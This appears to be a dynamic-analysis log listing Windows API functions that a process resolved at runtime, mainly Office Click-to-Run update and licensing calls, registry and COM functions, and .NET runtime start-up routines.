DynamicLoader: c2r32.dll/HrModifyOfficeProducts
DynamicLoader: c2r32.dll/HrGetChannelIdForDisplay
DynamicLoader: c2r32.dll/HrActivate
DynamicLoader: c2r32.dll/GetPropertyEx
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/IsClick2Run
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrApplyUpdatesNow
DynamicLoader: c2r32.dll/HrDownloadUpdatesNow
DynamicLoader: c2r32.dll/HrRefreshState
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/Repair
DynamicLoader: c2r32.dll/StartProgressAgent
DynamicLoader: c2r32.dll/HrBeginUpdatesDiscoveryPeriod
DynamicLoader: c2r32.dll/HrGetAreUpdatesLate
DynamicLoader: c2r32.dll/HrGetPendingUpdateDeadline
DynamicLoader: c2r32.dll/HrModifyOfficeProducts
DynamicLoader: c2r32.dll/HrGetChannelIdForDisplay
DynamicLoader: c2r32.dll/HrActivate
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/IsClick2Run
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/StartFB
DynamicLoader: c2r32.dll/WaitFB
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyToApply
DynamicLoader: c2r32.dll/HrGetExecutingScenario
DynamicLoader: c2r32.dll/HrDownloadUpdatesNow
DynamicLoader: c2r32.dll/HrRefreshState
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/HrBeginUpdatesDiscoveryPeriod
DynamicLoader: c2r32.dll/HrGetAreUpdatesLate
DynamicLoader: c2r32.dll/HrGetPendingUpdateDeadline
DynamicLoader: c2r32.dll/HrModifyOfficeProducts
DynamicLoader: c2r32.dll/HrActivate
DynamicLoader: c2r32.dll/GetPropertyEx
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: osppc.dll/SLClose
DynamicLoader: osppc.dll/SLConsumeRight
DynamicLoader: osppc.dll/SLGetPKeyId
DynamicLoader: osppc.dll/SLGetPolicyInformation
DynamicLoader: osppc.dll/SLGetApplicationPolicy
DynamicLoader: osppc.dll/SLGetLicensingStatusInformation
DynamicLoader: osppc.dll/SLLoadApplicationPolicies
DynamicLoader: osppc.dll/SLOpen
DynamicLoader: osppc.dll/SLPersistApplicationPolicies
DynamicLoader: osppc.dll/SLUnloadApplicationPolicies
DynamicLoader: osppc.dll/SLGetProductSkuInformation
DynamicLoader: osppc.dll/SLInstallProofOfPurchase
DynamicLoader: osppc.dll/SLInstallLicense
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: osppc.dll/SLRegisterPlugin
DynamicLoader: osppc.dll/SLUninstallProofOfPurchase
DynamicLoader: osppc.dll/SLGetPKeyInformation
DynamicLoader: osppc.dll/SLGetSLIDList
DynamicLoader: osppc.dll/SLDepositOfflineConfirmationId
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: osppc.dll/SLPersistRTSPayloadOverride
DynamicLoader: osppc.dll/SLSetAuthenticationData
DynamicLoader: osppc.dll/SLGetAuthenticationResult
DynamicLoader: osppc.dll/SLGetServiceInformation
DynamicLoader: osppc.dll/SLUninstallLicense
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/StartFB
DynamicLoader: c2r32.dll/WaitFB
DynamicLoader: c2r32.dll/GetProperty
DynamicLoader: c2r32.dll/GetPackageRoot
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyToApply
DynamicLoader: c2r32.dll/HrGetExecutingScenario
DynamicLoader: c2r32.dll/HrSetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrSetAreUpdatesFromAdminSource
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: c2r32.dll/HrApplyUpdatesNow
DynamicLoader: c2r32.dll/HrDownloadUpdatesNow
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/Repair
DynamicLoader: c2r32.dll/StartProgressAgent
DynamicLoader: c2r32.dll/MarkFinalIntegrateComplete
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/IsClick2Run
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/StartFB
DynamicLoader: c2r32.dll/WaitFB
DynamicLoader: c2r32.dll/GetProperty
DynamicLoader: c2r32.dll/GetPackageRoot
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyToApply
DynamicLoader: c2r32.dll/HrGetExecutingScenario
DynamicLoader: c2r32.dll/HrSetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrSetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrApplyUpdatesNow
DynamicLoader: c2r32.dll/HrDownloadUpdatesNow
DynamicLoader: c2r32.dll/HrRefreshState
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/Repair
DynamicLoader: c2r32.dll/StartProgressAgent
DynamicLoader: c2r32.dll/MarkFinalIntegrateComplete
DynamicLoader: c2r32.dll/HrBeginUpdatesDiscoveryPeriod
DynamicLoader: c2r32.dll/HrGetAreUpdatesLate
DynamicLoader: c2r32.dll/HrGetPendingUpdateDeadline
DynamicLoader: c2r32.dll/HrModifyOfficeProducts
DynamicLoader: c2r32.dll/HrGetChannelIdForDisplay
DynamicLoader: c2r32.dll/HrActivate
DynamicLoader: c2r32.dll/IsOSPPReadyEx
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/IsClick2Run
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/StartFB
DynamicLoader: c2r32.dll/WaitFB
DynamicLoader: c2r32.dll/GetProperty
DynamicLoader: c2r32.dll/GetPackageRoot
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyToApply
DynamicLoader: c2r32.dll/HrGetExecutingScenario
DynamicLoader: c2r32.dll/HrSetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrSetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrApplyUpdatesNow
DynamicLoader: c2r32.dll/HrDownloadUpdatesNow
DynamicLoader: c2r32.dll/HrRefreshState
DynamicLoader: c2r32.dll/IsRepairRequired
DynamicLoader: c2r32.dll/MarkFinalIntegrateComplete
DynamicLoader: c2r32.dll/HrBeginUpdatesDiscoveryPeriod
DynamicLoader: c2r32.dll/HrGetAreUpdatesLate
DynamicLoader: c2r32.dll/HrGetPendingUpdateDeadline
DynamicLoader: c2r32.dll/HrModifyOfficeProducts
DynamicLoader: c2r32.dll/HrGetChannelIdForDisplay
DynamicLoader: c2r32.dll/HrActivate
DynamicLoader: c2r32.dll/GetPropertyEx
DynamicLoader: c2r32.dll/GetTotalProgress
DynamicLoader: c2r32.dll/IsClick2Run
DynamicLoader: c2r32.dll/C2rVersion
DynamicLoader: c2r32.dll/IsRoaming
DynamicLoader: c2r32.dll/IsOSPPReady
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/ClearPropertyBagValue
DynamicLoader: c2r32.dll/SetPropertyBagToken
DynamicLoader: c2r32.dll/InstallProofOfPurchase
DynamicLoader: c2r32.dll/UninstallProofOfPurchase
DynamicLoader: c2r32.dll/HandleScheduledHeartbeat
DynamicLoader: c2r32.dll/MigrateOSPPToSPP
DynamicLoader: c2r32.dll/LicenseRepair
DynamicLoader: c2r32.dll/StartScenario
DynamicLoader: c2r32.dll/StartFB
DynamicLoader: c2r32.dll/WaitFB
DynamicLoader: c2r32.dll/GetProperty
DynamicLoader: c2r32.dll/GetPackageRoot
DynamicLoader: c2r32.dll/GetInstalledProducts
DynamicLoader: c2r32.dll/AddOfficeProduct
DynamicLoader: c2r32.dll/Launch
DynamicLoader: c2r32.dll/EnsureConnection
DynamicLoader: c2r32.dll/GetUpdateStatus
DynamicLoader: c2r32.dll/HrUpdateNow
DynamicLoader: c2r32.dll/SaveRecording
DynamicLoader: c2r32.dll/GetStatusValue
DynamicLoader: c2r32.dll/HrGetAreUpdatesEnabled
DynamicLoader: c2r32.dll/HrGetAreUpdatesCOMManaged
DynamicLoader: c2r32.dll/HrGetAreUpdatesFromAdminSource
DynamicLoader: c2r32.dll/HrGetAreUpdatesReadyForDownload
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso20win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso98win32client.dll/
DynamicLoader: mso.dll/
DynamicLoader: USERENV.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
DynamicLoader: POWRPROF.dll/PowerGetActiveScheme
DynamicLoader: POWRPROF.dll/PowerReadACValue
DynamicLoader: POWRPROF.dll/PowerReadDCValue
DynamicLoader: POWRPROF.dll/PowerGetActiveScheme
DynamicLoader: POWRPROF.dll/PowerReadACValue
DynamicLoader: POWRPROF.dll/PowerReadDCValue
DynamicLoader: PROPSYS.dll/VariantToStringAlloc
DynamicLoader: PROPSYS.dll/VariantToString
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: PROPSYS.dll/InitPropVariantFromStringAsVector
DynamicLoader: PROPSYS.dll/PSCoerceToCanonicalValue
DynamicLoader: sfc.dll/SfcIsFileProtected
DynamicLoader: SETUPAPI.dll/PnpIsFilePnpDriver
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: apphelp.dll/AllowPermLayer
DynamicLoader: kernel32.dll/BaseIsAppcompatInfrastructureDisabled
DynamicLoader: apphelp.dll/SdbInitDatabase
DynamicLoader: apphelp.dll/SdbGetMatchingExe
DynamicLoader: apphelp.dll/SdbReleaseDatabase
DynamicLoader: MPR.dll/WNetGetConnectionW
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/I_RpcExceptionFilter
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/StartServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: ole32.dll/CoGetObjectContext
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/MkParseDisplayName
DynamicLoader: ole32.dll/BindMoniker
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/VariantToStringAlloc
DynamicLoader: PROPSYS.dll/VariantToString
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteDWORD
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadDWORD
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadGUID
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: PROPSYS.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: PROPSYS.dll/InitPropVariantFromStringAsVector
DynamicLoader: PROPSYS.dll/PSCoerceToCanonicalValue
DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: api-ms-win-downlevel-shlwapi-l1-1-0.dll/PathCreateFromUrlW
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: comctl32.dll/
DynamicLoader: sfc.dll/SfcIsFileProtected
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: clr.dll/SetRuntimeInfo
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: clr.dll/DllGetClassObjectInternal
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/AddDllDirectory
DynamicLoader: mscoree.dll/CreateConfigStream
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: kernel32.dll/GetNumaHighestNodeNumber
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/AddSIDToBoundaryDescriptor
DynamicLoader: kernel32.dll/CreateBoundaryDescriptorW
DynamicLoader: kernel32.dll/CreatePrivateNamespaceW
DynamicLoader: kernel32.dll/OpenPrivateNamespaceW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/DeleteBoundaryDescriptor
DynamicLoader: kernel32.dll/WerRegisterRuntimeExceptionModule
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: mscoreei.dll/
DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize
DynamicLoader: ntdll.dll/NtSetSystemInformation
DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld
DynamicLoader: kernel32.dll/AddDllDirectory
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/SysStringByteLen
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: ntdll.dll/NtQueryInformationThread
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: kernel32.dll/CreateWaitableTimerExW
DynamicLoader: kernel32.dll/SetWaitableTimerEx
DynamicLoader: ADVAPI32.dll/EventActivityIdControl
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventWriteTransfer
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetThreadErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: VERSION.dll/GetFileVersionInfoSize
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfo
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValue
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetUserPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: nlssorting.dll/SortGetHandle
DynamicLoader: nlssorting.dll/SortCloseHandle
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: VERSION.dll/VerLanguageName
DynamicLoader: VERSION.dll/VerLanguageNameW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
